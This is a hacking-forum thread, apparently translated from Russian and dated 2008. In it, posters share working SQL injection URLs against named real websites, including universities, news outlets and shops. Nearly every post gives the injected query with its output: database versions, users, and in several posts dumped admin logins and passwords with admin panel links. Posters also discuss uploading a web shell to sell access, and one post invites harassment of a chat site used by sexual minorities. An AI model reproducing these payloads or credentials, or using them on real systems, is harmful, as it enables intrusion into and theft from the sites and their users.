SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. d1aVOL

    http://www.electionguide.org/country-news.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--
    version 4.1.22
    user eguide@localhost

    P.S.: the digit 3 is escaped in the title
     
  2. masternet

    http://www.archdioceseofcolombo.com/news.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7,8,9,10,11,12,13--
    4.1.20-max-log - [email protected] - rajindu_bishop
    ---------------------
    http://www.northwestu.edu/news/news.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7,8,9,10,11,12--
    5.0.45-community-nt - root@localhost - news
    ----------------------
    http://www.entrepreneurship.appstate.edu/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6--
    4.1.22 - entrepreneur@localhost - entrepreneur
    ---------------------
    http://www.eiu.edu/~slo/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5--
    4.1.22-log - slo@localhost - slo
    -------------------------------------
    http://www.sinfonie-hausverwaltung.de/news.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15--

    4.0.18 - sinfonie@localhost - sinfonie
    ---------------------------
    http://svpressa.ru/issue/news.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
    5.0.51a-log - svpressa@localhost - svpressa
    -----------------
    http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8--
    4.1.21-log - trudinfo@localhost - trudinfo_db
    ---------------------
    http://www.astrakhanfm.ru/news/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7--
    4.0.24-standart-log -astrakhanru@localhost -astrakhanru
    ------------------------
    http://www.fmaestro.ru/news.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),version(),user(),database()),6--
    4.0.23-standard - fmaestro1@localhost - db_fmaestro1
     
    #7002 masternet, 10 Dec 2008
    Last edited: 10 Dec 2008
  3. R1dex


    Code:
    http://new.groteck.ru/rss/?site_id=-1+union+select +1,2,3,4--
    Fields 3 and 4 are printable.

    Version() - 5.0.45-log

    ====================================================

    "The best Budapest site on the internet"

    Code:
    http://budapest-town.net/index.php?module=news&target=article&type=&category=&id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--
    Version() - 4.1.22

    Table prefix: tps_


    admin/217a968c3f6a1d9d9cf8784d1c83ca43 : tibor


    ====================================================

    "TOP-MANAGER [ a magazine for executives ]"

    Code:
    http://www.top-manager.ru/?a=1&number=-1+union+select+1,2,3,concat_ws(0x2f,table_name,table_rows,table_schema),5,6+from+information_schema.tables--
     
    #7003 R1dex, 10 Dec 2008
    Last edited: 10 Dec 2008
  4. Tigger

    "Chayka" magazine
    PR:3 TIC:500

    http://www.chayka.org/article.php?id=-872+union+select+1,2,3,4,5,6,7,8,9,10,11--
    seagullmag@localhost:seagullmag:5.0.51a
    Quotes are not filtered, but load_file is not available.
    Since it is version 5, the tables can be enumerated...
    I found the table: ibf_members

    P.S. Here is what else I found)) http://www.chayka.org/db.inc. The error popped up when visiting /images/
     
    #7004 Tigger, 11 Dec 2008
    Last edited: 11 Dec 2008
  5. spherics

    http://www.msfacts.org/online_newsDetails.php?ID=-123+union+select+1,2,version(),user(),5,database()/*

    version:4.0.24-standard
    user:root@localhost
    database:msf_db

    Login and password from MySQL

    root:SQLadmin
     
  6. Cennarios

    F***ing up the bourgeois chats with no limits....
    Apparently sexual minorities also hang out there!!!
    Feel free to help administer this disgusting resource!!!

    http://www.prassel.nu/index.php?page=ads&adno=-1+union+select+concat_ws
    (0x3a3a,name,password,email),2,3+from+user+limit+1,1--

    login:mats
    pass:lkll00lkll00
     
  7. masternet

    http://www.greetingcard.org/about.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10--
    5.0.67 - greetingcard@localhost - greetingcard_org_-_maindb
    --------------------------------
    http://www.simonsig.co.za/about.php?id=-1+union+select+1,concat_ws(char(3245,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
    5.0.51a-3ubuntu5.1-log ? [email protected] ? simonsig
    -------------------
    http://catalog.belstrin.ru/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    4.1.21-standard-log - clclon_user@localhost - clclon_catalogbelstrin
    ---------------------------
    http://vis.vis-belogorje.ru/site.php?id=-1+union+select+concat_ws(char(32,45,32),version(%20),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    4.1.21-standard-log - clclon_user@localhost - clclon_visbelogorje
    -----------------------------
     
    #7007 masternet, 11 Dec 2008
    Last edited: 11 Dec 2008
  8. Snap

    _http://rifma.ru

    http://rifma.ru/rifma.php?curr_node=55+union+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8+from+users+limit+0,1/*

    The SQLi is there, but I did not get output; there is filtering on the "curr_node" parameter. If it is not too much trouble, please tell me how to bypass it.

    Thanks in advance.
     
  9. masternet

    http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9--
    5.0.27-standard-log - WebUser@localhost - cgsc
    PR: 6
    -------------------------
    http://www.adilsoz.kz/site.php?id=7&lan=english&newsid=-1+union+select+concat_ws(char(32,45,32),version(),user(),database())--
    5.0.41-community-nt - adilsoz@localhost - adilsoz
    TIC: 160
    PR: 2
    -----------------------
    http://www.oxygenna.com/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8--
    5.0.27-community-nt - oxygenna@localhost - oxygenna
    PR: 3
    --------------------
    http://epodsolar.com/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
    4.1.20 - epodsol_usr1@localhost - epodsol_cm
    PR: 5
    -------------------
    http://gavlab.auburn.edu/about.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4--
    4.1.22-log - [email protected] - gavlab
    PR: 4
    --------------------
    http://www.swiss.org.nz/home.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,45,32),version(),user(),database()),10,11,12,13,14,15,16,17,18,19--
    4.1.21-standard-log - [email protected] - swisst db
    TIC: 10 PR: 4
    ----------------------
    http://www.poveditions.com/home.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2--
    TIC: 10 PR: 4
    ----------------------
     
    #7009 masternet, 11 Dec 2008
    Last edited: 11 Dec 2008
  10. Tigger

    masternet, on http://cgsc2.biology.yale.edu quotes are not filtered and file priv is allowed. Find the path and you can upload a shell))
     
  11. masternet

    But how do I find out the path? That is the question.. otherwise I would have already uploaded it and sold it)
    My dumper shows the same..
    Y - file priv
     
    #7011 masternet, 11 Dec 2008
    Last edited: 11 Dec 2008
  12. Kakoytoxaker

    masternet,
    This thread is not for questions and comments
    Tigger
    What makes you think file_priv is Y?

    http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,file_priv,3,4,5,6,7,8,9+from+mysql.user+where+user='WebUser'--
    "N"
     
  13. gisTy

    version( 5.0.15-standard )
    user( toutec@localhost )
    database( toutec )
    ##########
    version( 4.1.15-Debian_1ubuntu5-log )
    user( webrider@localhost )
    database( webridershop )

    ##############
    version( 4.1.22-log )
    user( [email protected] )
    database( formule19 )
     
    #7013 gisTy, 12 Dec 2008
    Last edited: 12 Dec 2008
  14. $n@ke

    PR7, looks like the forum of the international mobile operator Orange, but I may be wrong.
    Db: bddforums
    Version: 4.1.11-Debian_4sarge7-log
    User: [email protected]
     
  15. Cennarios

    http://www.pcr.org.ar/hoy.php?id_nota=-1+union+select+concat_ws(0x3a3a,usuario,clave)+from+usuarios+limit+0,1/*

    login: tansimPLE
    pass: IHfr78MET

    Admin panel
    http://www.pcr.org.ar/admin/_administrar.php?area=nomenclador

    Commies, damn...
     
  16. Cennarios

    http://www.exoticangkor.com/hotels.php?city_id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+tbl_user+limit+0,1--



    http://www.exoticangkor.com/admin/


    Baank!! (Co Jay and Silent Bob)


    -----------------------------------------------------------

    http://www.trinergy.at/pop_lexikon.php?id=-1+union+select+1,concat_ws(0x3a3a,username,password),3,4+from+users+limit+0,1/*

    http://www.trinergy.at/admin

    login:CW
    pass:CW

    Bam!!!!
    ---------------------------------------------------------
     
    #7016 Cennarios, 12 Dec 2008
    Last edited: 12 Dec 2008
  17. spherics

    A little shop...

    http://www.zakaz.kr.ua/vitrina/tovar/?lev1=9&lev2=12&lev3=17&id=-170/**/UNION/**/SELECT/**/AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT/**/CONCAT(id,0x7873716C696E6A64656C,login,0x7873716C696E6A64656C,pass,0x7873716C696E6A64656C,mymail)/**/FROM/**/zakazkr_zakaz.customers/**/LIMIT/**/5,1),0x7873716C696E6A656E64),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13--

    Finished off their users; there are many, I did not dump them all; whoever needs it can continue on their own...


     
  18. Dimi4

    Address: www.wbdg.org (74.205.45.163)

    Google PR 7 / 10
    Yandex TIC 60

    Code:
    http://www.wbdg.org/ccb/browse_cat.php?o=29&c=-4+union+select+concat_ws(0x3a3a,database(),version(),user()),2--
    Database Version: 5.0.67
    Database name: ccb
    User name: webscript@localhost
     
  19. Cennarios

    http://www.nrru.ac.th/web/healthcenter/main.php?pack=readnews&news_id=-1+union+select+1,user_name,3,user_pass,5,6,7,8+from+core_user+limit+0,1/*

    http://www.nrru.ac.th/web/healthcenter/admin/main.php

    login: admin
    pass: 12345678


    Arabikan gomikas pokhekas!!! lol
     
  20. iddqd

    Code:
    http://www.globalresearch.ca/PrintArticle.php?articleId=1+union+select+1,concat_ws(0x3a,VERSION(), USER(), DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52/*
    5.0.24a-log:u70167021@cgihost:d60162207
     